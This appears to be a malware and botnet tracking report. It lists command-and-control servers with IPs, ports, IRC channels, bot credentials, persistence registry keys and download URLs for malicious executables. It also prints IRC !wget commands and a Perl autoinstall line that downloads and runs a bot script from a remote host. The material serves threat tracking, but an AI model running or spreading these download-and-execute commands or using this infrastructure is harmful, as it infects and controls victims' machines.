DNS Lookup
Host Name | IP Address
dell-d3e62f7e26 | 10.1.8.2
flash.quickupdates.net | 46.4.232.76
www.whatismyip.com | 72.233.89.200
checkip.dyndns.org | 91.198.22.70
Download URLs
http://72.233.89.200/ (www.whatismyip.com)
http://72.233.89.200/ (www.whatismyip.com)
http://91.198.22.70/ (checkip.dyndns.org)
http://91.198.22.70/ (checkip.dyndns.org)
C&C Server: 46.4.232.76:5337
Server Password:
Username: blaze
Nickname: {iNF-00-DEU-XP-DELL-1855}
Channel: #join (Password: error)
Channel: #irape
Channel: #b
Channeltopic: :.aSc -S |.sub |.wu |.worm |.scan svrsvc_BRUTE 45 20 100 -r

b.wrzdns.com (botnet hosted with Russian Federation Navitel Rusconnect Ltd)
– DNS Queries:
Name | Query Type | Query Result | Successful | Protocol
b.wrzdns.com | DNS_TYPE_A | 195.162.69.158 | YES | udp
195.162.69.158:1726
Nick: {N}|AUT|XP|pc9|554622
Username: lerzri
Server Pass: (null)
Joined Channel: #b#
Channel Topic for Channel #b#: "D http://www.yanille.com/SetupYanilleMMO.exe"

irc.Vicio-Latino.Org (botnet hosted with United States Miami Fdcservers.net)
Connecting to 76.73.100.211 (8067)
Channel: ##Private##

ccteam.rox.net (botnet hosted with South Africa Johannesburg Global Web Intact T/a Screamer Telecoms)
Connecting to 41.57.133.155 (6667)
Channel: #Establish
Invisible Users: 1405
Operators: 1 operator(s) online
Channels: 17 channels formed
Clients: I have 787 clients and 1 servers
Local users: Current Local Users: 787 Max: 916
Global users: Current Global Users: 1430 Max: 1725

195.162.68.118 (botnet hosted with Russian Federation Navitel Rusconnect Ltd)
Remote Host | Port Number
195.162.68.118 | 7777
PASS google_x1[s7_4]rk-h.tmp
NICK {N}|USA|XP|COMPUTERNAME|192671
USER vsqcdz "" "lfjx" :COMPUTERNAME
JOIN #nonamefase
PRIVMSG #nonamefase :New Servant.
Now talking in #nonamefase
Modes On: [ #nonamefase ] [ +smntu ]
(niname) !wget http://www.rummagu.com/burnbuddy.exe
(niname) !wget http://shoponline.muji.fr/images/sss.exe
(niname) !wget http://www.rummagu.com/burnbuddy.exe
(niname) !!wget http://www.rummagu.com/burnbuddy.exe
(niname) !!wget http://www.rummagu.com/burnbuddy.exe
(niname) !wget http://www.rummagu.com/burnbuddy.exe
(niname) !msn Boot your

videosalegria.com (malware hosted with Brazil Comite Gestor Da Internet No Brasil)
DNS Lookup
Host Name | IP Address
0 | 127.0.0.1
videosalegria.com | 187.17.98.13
UDP Connections
Remote IP Address: 127.0.0.1 Port: 1066
Send Datagram: 115 packet(s) of size 1
Recv Datagram: 115 packet(s) of size 1
Download URLs
http://187.17.98.13/red.swf (videosalegria.com)
Outgoing connection to remote server: videosalegria.com TCP port 80
DNS Lookup
Host Name | IP Address
0 | 127.0.0.1
www.youtube.com

crocusfeerst.com (malware hosted with Netherlands Amsterdam Yisp)
DNS Lookup
Host Name | IP Address
crocusfeerst.com | 109.235.48.186
Opened listening TCP connection on port: 21346
Outgoing connection to remote server: crocusfeerst.com TCP port 80
Outgoing connection to remote server: crocusfeerst.com TCP port 80
Registry Changes by all processes
Create or Open Changes
HKEY_CURRENT_USER\Software\Microsoft\Tihit "Ohyti" = [REG_BINARY, size: 116 bytes]
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PhishingFilter "Enabled" = [REG_DWORD,

213.155.20.163 (Kbot HTTP bot hosted with Ukraine Tehnologii Budushego Llc)
Panel here: http://213.155.20.163/new/auth.php
DNS Lookup
Host Name | IP Address
213.155.20.163 | 213.155.20.163
Data posted to URLs
http://213.155.20.163/new/stat.php (213.155.20.163)
http://213.155.20.163/new/stat.php (213.155.20.163)
Outgoing connection to remote server: 213.155.20.163 TCP port 80
Outgoing connection to remote server: 213.155.20.163 TCP port 80
Registry Changes by all processes
Create or Open Changes
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\msupdate "ImagePath" = c:\windows\system32\mssrv32.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\msupdate "DisplayName" = Microsoft

irc.si.leet.la (linux bots hosted with Canada Iweb Dedicated Cl)
######################
my $server = "irc.si.leet.la","67.205.85.206";
my $port = "7000";
my $channel = "#mojok";
my $owner = "KaKuNg";
my $procname = "usr/sbin/php";
######################
autoinstall script:
################################################################
#!/usr/bin/perl
#
# Auto install script by SuWunk
#
# created: Oktober 2010
#
################################################################
{
system("wget http://tmp.ishaan.eu/home/e107_themes/vekna_bluez/ts.txt;lwp-download http://tmp.ishaan.eu/home/e107_themes/vekna_bluez/ts.txt;curl -O http://tmp.ishaan.eu/home/e107_themes/vekna_bluez/ts.txt;fetch http://tmp.ishaan.eu/home/e107_themes/vekna_bluez/ts.txt;ftp http://tmp.ishaan.eu/home/e107_themes/vekna_bluez/ts.txt;perl ts.txt irc.si.leet.la 7000 mojok KaKuNg;rm -rf *.txt");

irc.123empe123.co.cc (botnet hosted with United States Missoula Sharktech Internet Services)
– DNS Queries:
Name | Query Type | Query Result | Successful | Protocol
irc.123empe123.co.cc | DNS_TYPE_A | 64.32.29.221 | YES | udp
64.32.29.221:6667
Nick: [AUT|00|P|90924]
Username: XP-0641
Server Pass: pass
Joined Channel: ##Galactic## with Password Anti-GaYs
Channel Topic for Channel ##Galactic##: "http://www.windowscenter.net/descargas/msn.exe"
Now talking in ##Galactic##
Topic On: [ ##Galactic## ] [ http://www.windowscenter.net/descargas/msn.exe ]
Topic By: [ RooTED[ON] ]
Modes On: [